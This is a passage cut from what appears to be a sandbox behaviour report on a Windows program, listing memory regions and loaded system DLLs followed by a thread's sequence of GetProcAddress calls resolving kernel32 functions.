405 start_va = 0x31f0000 end_va = 0x31f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 406 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 407 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 408 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 409 start_va = 0x31d0000 end_va = 0x31d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 410 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 411 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 412 start_va = 0x3200000 end_va = 0x360dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 413 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 414 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 415 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 416 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 417 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 418 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 419 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 420 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 421 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 422 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 423 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 424 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 425 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 426 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 427 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 428 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 429 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 430 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 431 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 432 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 433 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 434 start_va = 0x3670000 end_va = 0x3670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 435 start_va = 0x3680000 end_va = 0x3680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 436 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 437 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 438 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 439 start_va = 0x36b0000 end_va = 0x36b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036b0000" filename = "" Region: id = 440 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 441 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 442 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 443 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 444 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 445 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 446 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 447 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 448 start_va = 0x36f0000 end_va = 0x36f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 449 start_va = 0x3700000 end_va = 0x3700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 450 start_va = 0x3710000 end_va = 0x3710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 451 start_va = 0x3720000 end_va = 0x3720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 470 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 471 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 472 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 473 start_va = 0x3750000 end_va = 0x3750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 474 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 475 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 476 start_va = 0x3750000 end_va = 0x3750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 477 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 478 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 479 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 480 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 481 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 482 start_va = 0x3760000 end_va = 0x3760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 483 start_va = 0x6cca0000 end_va = 0x6cd10fff monitored = 0 entry_point = 0x6ccf69e0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll") Region: id = 489 start_va = 0x74130000 end_va = 0x741f7fff monitored = 0 entry_point = 0x7419ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 495 start_va = 0x6cc50000 end_va = 0x6cc98fff monitored = 0 entry_point = 0x6cc56450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 496 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 497 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 498 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 499 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 500 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 501 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 502 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 503 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 504 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 505 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 516 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 517 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 518 start_va = 0x37a0000 end_va = 0x37a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 519 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 520 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 521 start_va = 0x37a0000 end_va = 0x37a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 522 start_va = 0x37b0000 end_va = 0x37b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 523 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 524 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 525 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 526 start_va = 0x37a0000 end_va = 0x37a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 527 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 528 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 529 start_va = 0x37b0000 end_va = 0x37b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 530 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 531 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 532 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 533 start_va = 0x37b0000 end_va = 0x37b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 534 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 535 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 536 start_va = 0x37c0000 end_va = 0x37c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 537 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 538 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 539 start_va = 0x37c0000 end_va = 0x37c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 540 start_va = 0x37d0000 end_va = 0x37d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 541 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 542 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 543 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 544 start_va = 0x3770000 end_va = 0x3770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003770000" filename = "" Region: id = 545 start_va = 0x3780000 end_va = 0x3780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 546 start_va = 0x3730000 end_va = 0x3730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003730000" filename = "" Region: id = 547 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0xd3c [0117.480] GetProcAddress (hModule=0x74580000, lpProcName="LoadResource") returned 0x745976f0 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="LockResource") returned 0x74597890 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="SizeofResource") returned 0x74598f80 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="FindResourceW") returned 0x745a2a40 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="lstrcmpiA") returned 0x74597830 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="MultiByteToWideChar") returned 0x74592ad0 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="WideCharToMultiByte") returned 0x74593880 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="IsDBCSLeadByte") returned 0x7459c990 [0117.481] GetProcAddress (hModule=0x74580000, lpProcName="GetWindowsDirectoryW") returned 0x745a5120 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="HeapCreate") returned 0x7459a100 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="HeapSetInformation") returned 0x7459a8e0 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="InitOnceExecuteOnce") returned 0x774dc2d0 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSection") returned 0x7788a200 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x745a6730 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="InitializeSListHead") returned 0x77895f60 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="IsDebuggerPresent") returned 0x7459b0b0 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="IsProcessorFeaturePresent") returned 0x74599bf0 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="IsValidCodePage") returned 0x7459a790 [0117.482] GetProcAddress (hModule=0x74580000, lpProcName="IsValidLocale") returned 0x7459ab40 [0117.483] GetProcAddress (hModule=0x74580000, lpProcName="IsWow64Process") returned 0x74599f10 [0117.483] GetProcAddress (hModule=0x74580000, lpProcName="K32GetPerformanceInfo") returned 0x745c16e0 [0117.483] GetProcAddress (hModule=0x74580000, lpProcName="K32GetProcessMemoryInfo") returned 0x745c1740 [0117.483] GetProcAddress (hModule=0x74580000, lpProcName="K32QueryWorkingSetEx") returned 0x745c17c0 [0117.483] GetProcAddress (hModule=0x74580000, lpProcName="LCMapStringW") returned 0x74599f30 [0117.483] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryExA") returned 0x7459a270 [0117.483] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryExW") returned 0x74597930 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="LoadLibraryW") returned 0x7459a840 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="LocalFree") returned 0x745979a0 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="LockFileEx") returned 0x745a6b90 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="MapViewOfFile") returned 0x74598d60 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="MoveFileW") returned 0x7459b1d0 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="OpenProcess") returned 0x74598bf0 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="OutputDebugStringA") returned 0x7459fde0 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="OutputDebugStringW") returned 0x745c19a0 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="PeekNamedPipe") returned 0x745c19b0 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="PostQueuedCompletionStatus") returned 0x7459a880 [0117.484] GetProcAddress (hModule=0x74580000, lpProcName="ProcessIdToSessionId") returned 0x74598fa0 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="QueryDosDeviceW") returned 0x745a6ba0 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="QueryPerformanceCounter") returned 0x745938a0 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="QueryPerformanceFrequency") returned 0x74598cc0 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="QueryThreadCycleTime") returned 0x7459f2e0 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="ReadConsoleW") returned 0x745a6fe0 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="ReadFile") returned 0x745a6bb0 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="ReadProcessMemory") returned 0x745c1c80 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="RegisterWaitForSingleObject") returned 0x74599f70 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="ReleaseSRWLockExclusive") returned 0x7787d080 [0117.485] GetProcAddress (hModule=0x74580000, lpProcName="ReleaseSemaphore") returned 0x745a67b0 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="RemoveDirectoryW") returned 0x745a6bf0 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="ReplaceFileW") returned 0x745a4f60 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="ResetEvent") returned 0x745a67c0 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="ResumeThread") returned 0x7459a800 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="RtlCaptureContext") returned 0x745a6290 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="RtlCaptureStackBackTrace") returned 0x7459cc80 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="RtlUnwind") returned 0x74598c10 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="SearchPathW") returned 0x7459e790 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="SetConsoleCtrlHandler") returned 0x745a6ff0 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="SetCurrentDirectoryW") returned 0x7459fb20 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="SetEndOfFile") returned 0x745a6c00 [0117.486] GetProcAddress (hModule=0x74580000, lpProcName="SetEnvironmentVariableW") returned 0x7459e9e0 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetFileAttributesW") returned 0x745a6c20 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetFilePointerEx") returned 0x745a6c50 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetHandleInformation") returned 0x745a6660 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetInformationJobObject") returned 0x745cbd30 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetNamedPipeHandleState") returned 0x745c2390 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetProcessShutdownParameters") returned 0x7459fd70 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetStdHandle") returned 0x745c2430 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetThreadPriority") returned 0x74599990 [0117.487] GetProcAddress (hModule=0x74580000, lpProcName="SetUnhandledExceptionFilter") returned 0x7459a940 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="SignalObjectAndWait") returned 0x745c25e0 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="SleepConditionVariableSRW") returned 0x77557fb0 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="SleepEx") returned 0x745a67f0 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleA") returned 0x745999f0 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="GetProcAddress") returned 0x745978b0 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="SystemTimeToTzSpecificLocalTime") returned 0x745a5c30 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="TerminateJobObject") returned 0x745cbf40 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="TerminateProcess") returned 0x745a5100 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="TlsAlloc") returned 0x7459a120 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="TlsFree") returned 0x7459a040 [0117.488] GetProcAddress (hModule=0x74580000, lpProcName="TlsGetValue") returned 0x74591b70 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="TlsSetValue") returned 0x745929d0 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="TransactNamedPipe") returned 0x745c2600 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77853650 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="UnhandledExceptionFilter") returned 0x745c2670 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="UnlockFileEx") returned 0x745a6c90 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="UnmapViewOfFile") returned 0x74599b20 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="UnregisterWaitEx") returned 0x7459f310 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAllocEx") returned 0x745c2730 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="VirtualFree") returned 0x74597600 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="VirtualFreeEx") returned 0x745c2750 [0117.489] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtectEx") returned 0x745c2790 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="VirtualQuery") returned 0x74597a90 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="VirtualQueryEx") returned 0x745c27b0 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="WaitForSingleObject") returned 0x745a6820 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="WaitForSingleObjectEx") returned 0x745a6830 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="WaitNamedPipeW") returned 0x745a5e70 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="WakeAllConditionVariable") returned 0x77898d70 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="Wow64GetThreadContext") returned 0x745c3e30 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="WriteConsoleW") returned 0x745a7020 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="WriteFile") returned 0x745a6ca0 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="WriteProcessMemory") returned 0x745c2850 [0117.490] GetProcAddress (hModule=0x74580000, lpProcName="lstrlenW") returned 0x74593690 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleFileNameA") returned 0x7459a720 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="CreateFileW") returned 0x745a6890 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="GetConsoleMode") returned 0x745a6f70 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="GetConsoleCP") returned 0x745a6f60 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="FlushFileBuffers") returned 0x745a69b0 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="GetStringTypeW") returned 0x74597950 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="FindResourceExW") returned 0x74598ca0 [0117.491] GetProcAddress (hModule=0x74580000, lpProcName="FreeEnvironmentStringsW") returned 0x7459a7e0 [0117.492] GetProcAddress (hModule=0x74580000, lpProcName="GetEnvironmentStringsW") returned 0x7459aac0 [0117.492] GetProcAddress (hModule=0x74580000, lpProcName="GetCommandLineW") returned 0x7459aba0 [0117.492] GetProcAddress (hModule=0x74580000, lpProcName="GetCPInfo") returned 0x7459a290 [0117.492] GetProcAddress (hModule=0x74580000, lpProcName="GetOEMCP") returned 0x745a5140 [0117.493] GetProcAddress (hModule=0x74580000, lpProcName="FindNextFileA") returned 0x745a6980 [0117.494] GetProcAddress (hModule=0x74580000, lpProcName="FindFirstFileExA") returned 0x745a6930 [0117.494] GetProcAddress (hModule=0x74580000, lpProcName="FindClose") returned 0x745a68e0 [0117.494] GetProcAddress (hModule=0x74580000, lpProcName="GetFileType") returned 0x745a6aa0 [0117.494] GetProcAddress (hModule=0x74580000, lpProcName="GetACP") returned 0x74598500 [0117.494] GetProcAddress (hModule=0x74580000, lpProcName="GetStdHandle") returned 0x7459a6e0 [0117.494] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleExW") returned 0x7459a2b0 [0117.495] GetProcAddress (hModule=0x74580000, lpProcName="ExitProcess") returned 0x745a7b30 [0117.495] GetProcAddress (hModule=0x74580000, lpProcName="GetSystemInfo") returned 0x7459a0f0 [0117.495] GetProcAddress (hModule=0x74580000, lpProcName="FreeLibrary") returned 0x74599f50 [0117.495] GetProcAddress (hModule=0x74580000, lpProcName="GetSystemTimeAsFileTime") returned 0x74597620 [0117.495] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcessId") returned 0x745923e0 [0117.495] GetProcAddress (hModule=0x74580000, lpProcName="GetStartupInfoW") returned 0x7459a740 [0117.495] GetProcAddress (hModule=0x74580000, lpProcName="CreateEventW") returned 0x745a66b0 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="CloseHandle") returned 0x745a6630 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentProcess") returned 0x745938c0 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="EncodePointer") returned 0x7788f730 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="SwitchToThread") returned 0x7459a690 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="GetModuleHandleW") returned 0x74599bc0 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtect") returned 0x74597a50 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="VirtualAlloc") returned 0x74597810 [0117.497] GetProcAddress (hModule=0x74580000, lpProcName="GetCurrentThreadId") returned 0x74591b90 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="Sleep") returned 0x74597990 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="SetEvent") returned 0x745a67d0 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="DeleteCriticalSection") returned 0x77880e60 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="InitializeCriticalSectionEx") returned 0x745a6740 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="LeaveCriticalSection") returned 0x7786f210 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="EnterCriticalSection") returned 0x7786f290 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="GetProcessHeap") returned 0x74597710 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="HeapSize") returned 0x7785bb20 [0117.498] GetProcAddress (hModule=0x74580000, lpProcName="HeapFree") 